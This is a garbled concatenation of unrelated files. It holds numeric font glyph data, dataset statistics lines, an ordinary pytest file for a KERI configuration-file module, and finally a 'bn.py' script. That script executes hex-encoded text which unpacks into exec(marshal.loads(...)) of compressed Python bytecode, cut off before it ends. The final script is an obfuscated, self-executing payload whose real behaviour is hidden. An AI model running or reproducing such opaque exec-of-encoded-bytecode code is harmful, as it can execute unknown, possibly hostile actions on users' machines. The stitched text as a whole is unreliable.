(9,9,6,7,8,7,9,7,8,9,5,7,5,8,4,8,8,8,8,5,9,7,9,8,8,8,7,5,6,8,8,7,5,9,7,9,9,9,7,9,9,7,9,9,9,9,7,9,7,9,8,9,9,9,9,9,9,9,9,9,6,6,0,9,5,9,6,6,6,8,6,9,9,6,9,9,7,7,6,7,6,7,6,8,7,7,7,7,7,7,6,9,6,5,8,),
(8,8,7,7,8,7,8,7,7,8,4,7,4,8,7,7,8,8,8,4,8,6,8,7,7,8,7,4,5,7,8,7,8,8,7,8,8,8,7,8,8,8,8,8,8,8,7,8,7,8,7,8,8,8,8,8,8,8,8,8,5,5,0,8,7,8,6,6,6,7,6,8,8,5,8,8,8,8,6,8,6,8,7,7,6,6,6,8,6,8,5,8,5,3,8,),
(3,4,1,1,1,1,4,1,4,1,1,4,1,3,4,1,1,1,1,1,1,1,1,1,1,3,4,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,4,4,4,1,1,4,1,4,1,1,1,2,2,4,3,4,4,4,1,1,1,4,1,1,1,1,1,1,1,1,2,1,1,4,4,1,1,),
(5,2,4,5,3,4,5,5,6,3,3,6,3,5,6,4,5,5,5,4,5,4,4,4,4,5,6,3,4,5,3,4,5,5,4,5,5,5,4,5,5,5,5,5,5,5,4,5,4,5,5,1,4,2,3,5,1,5,6,1,6,3,6,4,5,5,4,4,4,4,5,5,5,6,5,5,5,5,4,6,4,5,5,4,4,3,3,5,4,5,3,6,6,4,3,),
(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,),
(10,8,7,10,10,8,9,10,7,9,6,8,5,9,7,10,8,7,8,9,9,10,6,8,10,9,8,9,10,7,7,10,8,10,10,10,10,10,10,10,9,5,10,10,10,10,10,10,10,10,9,6,10,8,9,7,7,6,10,8,7,10,1,8,8,10,10,10,10,9,10,10,10,7,10,10,10,10,10,10,10,10,10,9,10,9,9,8,9,8,8,10,6,8,9,),
(8,5,0,6,0,0,8,7,8,2,0,9,4,8,9,1,4,2,2,1,2,1,2,1,1,8,9,1,0,1,3,5,0,1,0,0,1,2,0,0,6,3,1,2,0,0,0,1,3,0,1,0,0,0,0,1,0,1,9,4,6,0,9,7,2,1,3,1,2,4,8,1,8,6,2,8,0,1,1,9,2,4,3,4,1,2,0,2,7,3,6,9,6,0,3,),
(2,2,0,0,2,1,2,1,1,1,0,0,0,1,0,1,0,2,2,0,2,0,1,1,1,1,0,0,0,0,2,0,0,2,1,2,2,2,1,2,1,0,2,2,2,2,1,2,1,2,1,1,2,2,2,1,1,1,2,1,1,0,0,1,0,2,0,0,0,1,0,2,2,0,2,2,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,2,1,0,2,),
(7,6,7,7,7,7,6,7,5,7,7,6,7,7,6,7,7,7,7,7,7,7,6,7,7,7,6,7,7,7,5,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,3,7,6,6,7,4,7,7,5,4,7,0,5,7,7,7,7,7,6,7,7,7,5,7,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,7,7,4,7,7,),
(8,6,8,8,8,8,7,8,5,7,8,6,8,7,6,8,6,7,7,8,7,8,6,8,8,7,6,8,8,7,6,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,7,4,8,6,7,7,5,7,8,6,5,8,0,6,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,6,7,7,8,8,5,8,7,),
(6,5,5,6,6,5,5,6,3,6,2,5,1,6,5,6,5,6,6,4,6,6,5,5,6,6,5,3,1,6,4,6,6,6,6,6,6,6,6,6,5,5,6,6,6,6,6,6,6,6,6,2,6,5,5,5,3,6,6,4,3,5,0,4,6,6,5,5,5,5,5,6,6,4,6,6,6,6,5,6,5,6,6,5,6,6,6,5,6,6,3,6,3,1,6,),
(8,8,8,8,8,8,8,8,8,8,8,7,8,8,7,8,8,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,0,8,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,),
(7,5,6,7,7,7,6,7,4,6,7,6,7,7,6,7,6,7,7,7,7,7,6,7,7,7,6,7,7,7,5,7,7,7,7,7,7,7,7,7,6,6,7,7,7,7,7,7,7,7,7,3,7,5,6,6,4,7,7,5,4,7,0,5,7,7,7,7,7,6,7,7,7,4,7,7,7,7,7,7,7,7,7,6,7,6,6,6,6,7,7,7,4,7,6,),
(4,5,3,4,4,3,5,4,5,3,2,3,2,4,1,4,2,2,2,2,4,4,2,4,4,4,3,2,2,3,2,3,2,4,4,4,4,4,4,4,3,2,4,4,4,4,4,4,4,4,4,2,4,3,3,2,2,2,5,5,5,2,0,5,2,5,2,2,2,4,2,5,4,3,5,5,4,4,2,4,2,4,3,4,4,4,4,4,4,4,2,5,5,2,4,),
(8,8,8,8,8,8,8,8,6,8,8,7,8,8,7,8,8,8,8,8,8,8,7,8,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,4,8,7,7,8,6,8,8,7,6,8,7,6,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,6,8,8,),
(8,6,8,8,8,8,7,8,6,7,8,7,8,8,7,8,8,8,8,8,8,8,7,8,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,4,8,6,7,8,5,8,8,6,5,8,0,6,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,8,7,8,8,8,5,8,7,),
(1,1,1,1,1,1,1,1,0,1,1,0,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,),
(4,4,4,4,4,4,4,4,3,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,3,4,4,4,4,4,4,4,4,4,4,4,4,3,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,3,4,4,),
(7,6,6,6,6,5,6,6,5,5,3,6,3,7,6,6,7,7,6,3,6,6,6,6,6,7,6,3,4,6,5,6,7,7,6,7,7,7,6,7,7,7,7,7,7,7,6,7,6,7,6,3,6,5,5,7,4,7,7,5,4,4,0,5,6,7,5,5,5,6,5,7,7,5,7,7,7,7,5,7,5,7,6,6,6,6,6,7,6,7,4,7,4,4,6,),
(1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,),
(11,10,11,11,11,11,10,11,9,11,11,10,11,11,10,11,11,11,11,11,11,11,10,11,11,11,10,11,11,11,9,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,7,11,10,10,11,8,11,11,9,8,11,2,9,11,11,11,11,11,10,11,11,11,9,11,11,11,11,11,11,11,11,11,10,11,11,11,11,11,11,11,11,8,11,11,),
(8,6,8,8,8,8,7,8,6,7,8,7,8,8,7,8,8,8,8,8,8,8,7,8,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,4,8,6,7,8,5,8,8,6,5,8,0,6,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,8,7,8,8,8,5,8,7,),
(8,6,8,8,8,8,7,8,5,7,8,6,8,7,6,8,6,7,7,8,7,8,6,8,8,7,6,8,8,7,6,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,7,4,8,6,7,7,5,7,8,6,5,8,0,6,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,6,7,7,8,8,5,8,7,),
(8,6,8,8,8,8,7,8,5,7,8,6,8,7,6,8,6,7,7,8,7,8,6,8,8,7,6,8,8,7,6,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,7,4,8,6,7,7,5,7,8,6,5,8,1,6,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,6,7,7,8,8,5,8,7,),
(8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,6,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,4,8,7,7,8,6,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,),
(5,5,4,5,5,4,5,5,2,4,1,3,1,4,1,5,3,1,1,2,5,5,0,5,5,5,4,1,1,4,0,4,2,5,5,5,5,5,5,5,4,1,5,5,5,5,5,5,5,5,5,1,5,4,4,3,3,1,5,4,2,3,0,3,3,5,3,3,3,5,3,5,5,4,5,5,5,5,3,5,3,5,4,5,5,5,5,5,5,5,2,5,2,1,5,),
(6,5,6,6,6,6,5,6,3,6,2,5,1,6,5,6,5,6,6,5,6,6,5,6,6,6,5,4,6,6,4,6,6,6,6,6,6,6,6,6,5,5,6,6,6,6,6,6,6,6,6,2,6,5,5,5,3,6,6,4,3,5,0,4,6,6,6,6,6,5,6,6,6,4,6,6,6,6,6,6,6,6,6,5,6,6,6,5,6,6,3,6,3,6,6,),
(5,5,4,5,5,4,5,5,3,4,2,4,2,5,4,5,5,5,4,2,5,5,4,5,5,5,4,2,2,4,3,4,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,2,5,4,4,5,3,5,5,4,2,3,0,3,4,5,3,3,3,5,3,5,5,4,5,5,5,5,3,5,3,5,4,5,5,5,5,5,5,5,2,5,2,2,5,),
(8,8,8,8,8,8,8,8,6,8,8,7,8,8,7,8,8,8,8,8,8,8,7,8,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,4,8,7,7,8,6,8,8,7,5,8,0,6,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,5,8,8,),
(7,7,6,7,7,6,7,7,4,7,6,5,6,6,4,7,5,4,4,6,7,7,3,7,7,7,6,6,6,6,4,7,5,7,7,7,7,7,7,7,6,4,7,7,7,7,7,7,7,7,7,3,7,6,6,5,5,4,7,6,4,6,0,5,6,7,6,6,6,7,6,7,7,6,7,7,7,7,6,7,6,7,7,7,7,7,7,7,7,7,6,7,4,6,7,),
(11,11,10,11,11,10,11,11,8,11,10,9,10,10,8,11,9,9,9,10,11,11,8,11,11,11,10,10,10,10,8,11,9,11,11,11,11,11,11,11,10,9,11,11,11,11,11,11,11,11,11,7,11,10,10,9,9,9,11,10,8,10,2,9,10,11,10,10,10,11,10,11,11,10,11,11,11,11,10,11,10,11,11,11,11,11,11,11,11,11,10,11,8,10,11,),
(7,7,6,7,7,6,7,7,5,6,5,6,5,7,6,7,7,7,6,5,7,7,6,7,7,7,6,5,5,6,5,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,3,7,6,6,7,5,7,7,6,4,5,0,5,6,7,5,5,5,7,5,7,7,6,7,7,7,7,5,7,5,7,6,7,7,7,7,7,7,7,5,7,4,5,7,),
(7,7,6,7,7,6,7,7,4,7,6,5,6,6,4,7,5,4,4,6,7,7,3,7,7,7,6,6,6,6,4,7,5,7,7,7,7,7,7,7,6,4,7,7,7,7,7,7,7,7,7,3,7,6,6,5,5,4,7,6,4,6,3,5,6,7,6,6,6,7,6,7,7,6,7,7,7,7,6,7,6,7,7,7,7,7,7,7,7,7,6,7,4,6,7,),
(6,6,5,6,6,5,6,6,4,6,4,5,4,6,5,6,6,6,5,4,6,6,5,6,6,6,5,4,5,5,4,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,2,6,5,5,6,4,6,6,5,3,5,0,4,5,6,5,5,5,6,5,6,6,5,6,6,6,6,5,6,5,6,6,6,6,6,6,6,6,6,4,6,3,3,6,),
(6,7,4,4,4,4,7,4,7,4,2,7,2,6,7,4,4,4,4,3,4,4,4,4,4,6,7,2,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,7,7,7,3,4,7,4,7,4,4,4,5,5,7,6,7,7,7,4,4,4,7,4,4,4,4,4,4,4,4,5,4,3,7,7,4,4,),
(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,),
(7,4,5,6,6,6,6,7,4,4,7,5,7,6,4,7,5,4,4,7,4,7,4,6,6,6,5,7,5,4,4,7,5,7,7,7,7,7,7,7,6,4,7,7,7,7,7,7,7,7,4,4,7,5,6,4,4,4,7,5,4,5,4,5,5,7,7,7,7,6,7,7,7,4,7,7,7,7,7,7,7,7,7,6,7,6,6,5,6,4,7,7,3,6,4,),
(10,6,8,10,10,9,9,10,7,7,10,8,10,9,7,10,8,6,8,10,5,10,7,9,10,9,8,10,10,5,7,10,8,10,10,10,10,10,10,10,9,5,10,10,10,10,10,10,10,10,9,6,10,8,9,7,7,7,10,8,7,10,1,8,8,10,10,10,10,9,10,10,10,7,10,10,10,10,10,10,10,10,10,9,10,9,9,8,9,7,10,10,6,9,9,),
(6,6,5,6,6,5,6,6,4,6,2,4,1,5,3,6,6,6,6,4,6,6,5,6,6,6,5,4,5,6,6,6,4,6,6,6,6,6,6,6,5,3,6,6,6,6,6,6,6,6,6,5,6,6,6,5,5,5,6,5,3,5,0,5,5,6,5,5,5,6,5,6,6,5,6,6,6,6,5,6,5,6,6,6,6,6,6,6,6,6,3,6,3,3,6,),
)
# End of font
| 30.261186 | 291 | 0.384495 | 13,239 | 58,162 | 1.688723 | 0.018355 | 0.092857 | 0.106812 | 0.114506 | 0.867424 | 0.823635 | 0.770497 | 0.716644 | 0.664087 | 0.600886 | 0 | 0.466056 | 0.376466 | 58,162 | 1,921 | 292 | 30.276939 | 0.150361 | 0.258605 | 0 | 0.859466 | 1 | 0 | 0.000242 | 0 | 0 | 0 | 0.18704 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
7e5db171bffae4cbb84bada0332c28ef2a39e5ba | 12,273 | py | Python | tests/app/test_configing.py | SmithSamuelM/keripy-wot | ec329f4e011026d655bf46d269792ac97f23276d | [
"Apache-2.0"
] | 10 | 2021-06-09T16:15:32.000Z | 2022-03-28T22:14:11.000Z | tests/app/test_configing.py | SmithSamuelM/keripy-wot | ec329f4e011026d655bf46d269792ac97f23276d | [
"Apache-2.0"
] | 47 | 2021-06-17T20:00:02.000Z | 2022-03-31T20:20:44.000Z | tests/app/test_configing.py | SmithSamuelM/keripy-wot | ec329f4e011026d655bf46d269792ac97f23276d | [
"Apache-2.0"
] | 6 | 2021-06-10T11:24:25.000Z | 2022-01-28T08:07:43.000Z | # -*- encoding: utf-8 -*-
"""
tests.app.configin module
"""
import os
import shutil
import pytest
from hio.base import doing
from keri.app import configing
from keri.core import coring
def test_configer():
"""
Test Configer class
"""
# Test Filer with file not dir
filepath = '/usr/local/var/keri/cf/main/conf.json'
if os.path.exists(filepath):
os.remove(filepath)
cfr = configing.Configer() # defaults
# assert cfr.path == filepath
# github runner does not allow /usr/local/var
assert cfr.path.endswith("keri/cf/main/conf.json")
assert cfr.opened
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.file.closed
assert not cfr.file.read()
assert cfr.human
# plain json manually
data = dict(name="habi", oobi="ABCDEFG")
wmsg = coring.dumps(data)
assert hasattr(wmsg, "decode") # bytes
assert len(wmsg) == cfr.file.write(wmsg)
assert 0 == cfr.file.seek(0)
rmsg = cfr.file.read()
assert rmsg == wmsg
assert data == coring.loads(rmsg)
# default is hjson for .human == True
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
assert 0 == cfr.file.seek(0)
rmsg = cfr.file.read()
assert rmsg == b'{\n name: hope\n oobi: abc\n}' # hjson
cfr.close()
assert not cfr.opened
assert cfr.file.closed
# assert cfr.path == filepath
assert cfr.path.endswith("keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
with pytest.raises(ValueError):
rdata = cfr.get()
cfr.reopen(reuse=True) # reuse True and clear False so don't remake
assert cfr.opened
assert not cfr.file.closed
# assert cfr.path == filepath
assert cfr.path.endswith("keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == wdata # not empty
cfr.reopen() # reuse False so remake but not clear
assert cfr.opened
assert not cfr.file.closed
# assert cfr.path == filepath
assert cfr.path.endswith("keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == wdata # not empty
cfr.reopen(reuse=True, clear=True) # clear True so remake even if reuse
assert cfr.opened
assert not cfr.file.closed
# assert cfr.path == filepath
assert cfr.path.endswith("keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == {} # empty
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
cfr.reopen(clear=True) # clear True so remake
assert cfr.opened
assert not cfr.file.closed
# assert cfr.path == filepath
assert cfr.path.endswith("keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == {} # empty
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
cfr.close(clear=True)
assert not os.path.exists(cfr.path)
with pytest.raises(ValueError):
rdata = cfr.get()
# Test with plain json human==False
cfr = configing.Configer(human=False)
# assert cfr.path == filepath
# github runner does not allow /usr/local/var
assert cfr.path.endswith("keri/cf/main/conf.json")
assert cfr.opened
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.human
assert not cfr.file.closed
assert not cfr.file.read()
# .human == False
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
assert 0 == cfr.file.seek(0)
rmsg = cfr.file.read()
assert rmsg == b'{\n "name": "hope",\n "oobi": "abc"\n}' # plain json
cfr.close(clear=True)
assert not os.path.exists(cfr.path)
# Test with altPath by using not permitted headDirPath /opt/keri to force Alt
filepath = '/Users/samuel/.keri/cf/main/conf.json'
if os.path.exists(filepath):
os.remove(filepath)
cfr = configing.Configer(headDirPath="/root/keri")
assert cfr.path.endswith(".keri/cf/main/conf.json")
assert cfr.opened
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.file.closed
assert not cfr.file.read()
data = dict(name="habi", oobi="ABCDEFG")
wmsg = coring.dumps(data)
assert hasattr(wmsg, "decode") # bytes
assert len(wmsg) == cfr.file.write(wmsg)
assert 0 == cfr.file.seek(0)
rmsg = cfr.file.read()
assert rmsg == wmsg
assert data == coring.loads(rmsg)
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
cfr.close()
assert not cfr.opened
assert cfr.file.closed
assert cfr.path.endswith(".keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
with pytest.raises(ValueError):
rdata = cfr.get()
cfr.reopen(reuse=True) # reuse True and clear False so don't remake
assert cfr.opened
assert not cfr.file.closed
assert cfr.path.endswith(".keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == wdata # not empty
cfr.reopen() # reuse False so remake but not clear
assert cfr.opened
assert not cfr.file.closed
assert cfr.path.endswith(".keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == wdata # not empty
cfr.reopen(reuse=True, clear=True) # clear True so remake even if reuse
assert cfr.opened
assert not cfr.file.closed
assert cfr.path.endswith(".keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == {} # empty
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
cfr.reopen(clear=True) # clear True so remake
assert cfr.opened
assert not cfr.file.closed
assert cfr.path.endswith(".keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == {} # empty
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
cfr.close(clear=True)
assert not os.path.exists(cfr.path)
with pytest.raises(ValueError):
rdata = cfr.get()
#test openCF hjson
with configing.openCF() as cfr: # default uses json and temp==True
filepath = '/tmp/keri_cf_2_zu01lb_test/keri/cf/main/test.json'
assert cfr.path.startswith('/tmp/keri_')
assert cfr.path.endswith('_test/keri/cf/main/test.json')
assert cfr.opened
assert cfr.human
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.file.closed
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
assert not os.path.exists(cfr.path) # if temp cleans
#test openCF json
with configing.openCF(human=False) as cfr: # default uses json and temp==True
filepath = '/tmp/keri_cf_2_zu01lb_test/keri/cf/main/test.json'
assert cfr.path.startswith('/tmp/keri_')
assert cfr.path.endswith('_test/keri/cf/main/test.json')
assert cfr.opened
assert not cfr.human
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.file.closed
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
assert not os.path.exists(cfr.path) # if temp cleans
#test openCF mgpk
with configing.openCF(fext='mgpk') as cfr: # default uses temp==True
assert cfr.path.startswith('/tmp/keri_')
assert cfr.path.endswith('_test/keri/cf/main/test.mgpk')
assert cfr.opened
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.file.closed
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
assert not os.path.exists(cfr.path) # if temp cleans
# test openCF cbor
with configing.openCF(fext='cbor') as cfr: # default uses temp==True
assert cfr.path.startswith('/tmp/keri_')
assert cfr.path.endswith('_test/keri/cf/main/test.cbor')
assert cfr.opened
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.file.closed
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
assert not os.path.exists(cfr.path) # if temp cleans
"""Done Test"""
def test_configer_doer():
"""
Test ConfigerDoer
"""
cfr0 = configing.Configer(name='test0', temp=True, reopen=False)
assert cfr0.opened == False
assert cfr0.path == None
assert cfr0.file == None
cfrDoer0 = configing.ConfigerDoer(configer=cfr0)
assert cfrDoer0.configer == cfr0
assert cfrDoer0.configer.opened == False
cfr1 = configing.Configer(name='test1', temp=True, reopen=False)
assert cfr1.opened == False
assert cfr1.path == None
assert cfr0.file == None
cfrDoer1 = configing.ConfigerDoer(configer=cfr1)
assert cfrDoer1.configer == cfr1
assert cfrDoer1.configer.opened == False
limit = 0.25
tock = 0.03125
doist = doing.Doist(limit=limit, tock=tock)
doers = [cfrDoer0, cfrDoer1]
doist.doers = doers
doist.enter()
assert len(doist.deeds) == 2
assert [val[1] for val in doist.deeds] == [0.0, 0.0] # retymes
for doer in doers:
assert doer.configer.opened
assert "_test/keri/cf/main/" in doer.configer.path
doist.recur()
assert doist.tyme == 0.03125 # on next cycle
assert len(doist.deeds) == 2
for doer in doers:
assert doer.configer.opened == True
for dog, retyme, index in doist.deeds:
dog.close()
for doer in doers:
assert doer.configer.opened == False
assert not os.path.exists(doer.configer.path)
# start over
doist.tyme = 0.0
doist.do(doers=doers)
assert doist.tyme == limit
for doer in doers:
assert doer.configer.opened == False
assert not os.path.exists(doer.configer.path)
# test with filed == True
cfr0 = configing.Configer(name='test0', temp=True, reopen=False, filed=True)
assert cfr0.opened == False
assert cfr0.path == None
assert cfr0.file == None
cfrDoer0 = configing.ConfigerDoer(configer=cfr0)
assert cfrDoer0.configer == cfr0
assert cfrDoer0.configer.opened == False
cfr1 = configing.Configer(name='test1', temp=True, reopen=False, filed=True)
assert cfr1.opened == False
assert cfr1.path == None
assert cfr0.file == None
cfrDoer1 = configing.ConfigerDoer(configer=cfr1)
assert cfrDoer1.configer == cfr1
assert cfrDoer1.configer.opened == False
limit = 0.25
tock = 0.03125
doist = doing.Doist(limit=limit, tock=tock)
doers = [cfrDoer0, cfrDoer1]
doist.doers = doers
doist.enter()
assert len(doist.deeds) == 2
assert [val[1] for val in doist.deeds] == [0.0, 0.0] # retymes
for doer in doers:
assert doer.configer.opened
assert "_test/keri/cf/main/" in doer.configer.path
assert doer.configer.path.endswith(".json")
assert doer.configer.file is not None
assert not doer.configer.file.closed
doist.recur()
assert doist.tyme == 0.03125 # on next cycle
assert len(doist.deeds) == 2
for doer in doers:
assert doer.configer.opened
assert doer.configer.file is not None
assert not doer.configer.file.closed
for dog, retyme, index in doist.deeds:
dog.close()
for doer in doers:
assert doer.configer.opened == False
assert not os.path.exists(doer.configer.path)
assert doer.configer.file is None
# start over
doist.tyme = 0.0
doist.do(doers=doers)
assert doist.tyme == limit
for doer in doers:
assert doer.configer.opened == False
assert not os.path.exists(doer.configer.path)
assert doer.configer.file is None
"""End Test"""
if __name__ == "__main__":
test_configer()
| 31.149746 | 82 | 0.639127 | 1,731 | 12,273 | 4.514154 | 0.091277 | 0.074866 | 0.046071 | 0.046071 | 0.911441 | 0.910289 | 0.907602 | 0.905298 | 0.905298 | 0.892757 | 0 | 0.0114 | 0.235232 | 12,273 | 393 | 83 | 31.229008 | 0.821117 | 0.104946 | 0 | 0.903974 | 0 | 0 | 0.081653 | 0.053024 | 0 | 0 | 0 | 0 | 0.622517 | 1 | 0.006623 | false | 0 | 0.019868 | 0 | 0.02649 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7e7c8cc541110c95a0fbad77e36d2570638f5925 | 28,527 | py | Python | bn.py | sillytuktuk2020/bn | 547cadc5aeef0b97891543c50ccb92563c47486b | [
"Apache-2.0"
] | null | null | null | bn.py | sillytuktuk2020/bn | 547cadc5aeef0b97891543c50ccb92563c47486b | [
"Apache-2.0"
] | null | null | null | bn.py | sillytuktuk2020/bn | 547cadc5aeef0b97891543c50ccb92563c47486b | [
"Apache-2.0"
] | null | null | null | # Auther : AKSHAY DHAWAN
# GitHub : https://github.com/sillytuktuk2020
# instagram decent_deep_raadhe
import base64
exec(base64.b16decode('2320436F6D70696C6564204279203A2042696E79616D696E0A2320476974487562203A2068747470733A2F2F6769746875622E636F6D2F42696E79616D696E2D62696E6E690A2320596F7554756265204368616E6E656C203A20547269636B2050726F6F660A696D706F7274206D61727368616C0A65786563286D61727368616C2E6C6F6164732827635C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830335C7830305C7830305C783030405C7830305C7830305C78303073215C7830305C7830305C783030645C7830305C783030645C7830315C7830306C5C7830305C7830305A5C7830305C783030655C7830305C7830306A5C7830315C783030645C7830325C7830305C7838335C7830315C783030645C7830315C7830305C78303455645C7830315C78303053285C7830335C7830305C7830305C783030695C7866665C7866665C7866665C7866664E73205C7830625C7830305C783030785C7839635C786464595C7864646E5C7864625C7863385C7831355C7862655C7839365C783965625C7863325C786164455C7861395C783932295C7838615C7839322C5C7864625C7861395C7862305C7862305C7831646763645367375C7863655C7830325C783835235C7831304372243126395C7830635C7838375C786234645C7863335C7831375B5C7861305C7866372D5C7864306D7B535C7866345C7861327D5C7838382E5C7862305C7831377D5C7838317D5C6E5C7861335C7866377D5C7838355C783965335C7866635C783131455C786362495C7839636E7B515C7863365C7839313833675C7863655C7839635C7839666F5C78636539335C7866615C78656351375C783131515C786437725C7838336E785C7831355C78636679605C7864343F5C7862335C7862395C7865335C7830365C786233715C7831324F5C786237775C7865625C7866355C7862615C7865625C7838373C5C7838615C745C7831375C78316471253A5C7862315C7865625C7862335C7838654363265F225C783161385C7864635C7865665C7863635C7861395C7839387B5C7861655C7864355C783839585C275C783965475C7838635C7865325C7866635C7863655B5C7863315C7838334E5C783132793060746C5C7863652F5C5C5C78383634335C7831365C783837545C7838383A5C7831